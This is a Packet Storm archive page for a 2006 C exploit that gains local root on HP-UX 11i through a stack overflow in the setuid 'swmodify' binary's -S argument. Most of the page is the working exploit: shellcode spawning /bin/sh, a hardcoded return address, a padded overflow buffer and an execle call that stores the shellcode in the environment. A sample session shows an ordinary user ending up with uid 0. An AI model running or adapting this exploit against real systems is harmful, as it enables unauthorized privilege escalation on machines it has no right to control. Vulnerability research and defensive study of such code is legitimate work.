what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

prdelka-vs-HPUX-swmodify.c

prdelka-vs-HPUX-swmodify.c
Posted Oct 27, 2006
Authored by prdelka | Site prdelka.blackart.org.uk

HP-UX swmodify buffer overflow exploit. HP-UX 'swmodify' contains an exploitable stack overflow in the handling of command line arguements. Specifically the problem occurs due to insufficient bounds checking in the "-S" optional argument. 'swmodify' is installed setuid root by default in HP-UX and allows for local root compromise when exploiting this issue.

tags | exploit, overflow, local, root
systems | hpux
SHA-256 | 6b1717b21f6b056cf18126c41c392c3e1536cac16fd737bd04e4d45e08ff85de

prdelka-vs-HPUX-swmodify.c

Change Mirror Download
/* HP-UX swmodify buffer overflow exploit
* =======================================
* HP-UX 'swmodify' contains an exploitable stack overflow
* in the handling of command line arguements. Specifically the
* problem occurs due to insufficent bounds checking in the "-S"
* optional arguement. 'swmodify' is installed setuid root by
* default in HP-UX and allows for local root compromise when
* exploiting this issue.
*
* Example.
* $ cc prdelka-vs-HPUX-swmodify.c -o prdelka-vs-HPUX-swmodify
* /usr/ccs/bin/ld: (Warning) At least one PA 2.0 object file
* (prdelka-vs-HPUX-swmodify.o) was detected. The linked output may
* not run on a PA 1.x system.
* $ uname -a
* HP-UX hpux B.11.11 U 9000/785 2012383315 unlimited-user license
* $ id
* uid=102(user) gid=20(users)
* $ ls -al /usr/sbin/swmodify
* -r-sr-xr-x 2 root bin 1323008 Nov 3 2003 /usr/sbin/swmodify
* $ ./prdelka-vs-HPUX-swmodify
* [ HP-UX 11i 'swmodify' local root exploit
* $ id
* uid=0(root) gid=3(sys) euid=102(user) egid=20(users)
*
* - prdelka
*/

char shellcode[]=
"\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
"\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08"
"\xb4\x16\x70\x16""/bin/sh";

int main(){
char adr[4],*b,*a,*c,*envp[1];
int i;
*(unsigned long*)adr=0x7f7f0434;
printf("[ HP-UX 11i 'swmodify' local root exploit\n");
b=(char*)malloc(2048);
a=b;
memset(b,0,2048);
memset(b,'a',1053);
b+=1053;
for(i=0;i<4;i++) *b++=adr[i%4];
*b++="A";
c=(char*)malloc(2048);
b=c;
memset(c,0,2048);
sprintf(c,"PATH=");
b+=5;
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
envp[0]=c;
envp[1]=0;
execle("/usr/sbin/swmodify","swmodify","-S",a,0,envp);
}

Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close